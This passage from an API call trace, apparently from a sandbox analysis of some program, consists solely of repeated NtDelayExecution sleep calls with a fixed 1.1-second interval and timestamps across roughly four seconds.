(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0157.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.687] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0158.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0159.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.545] NtDelayExecution 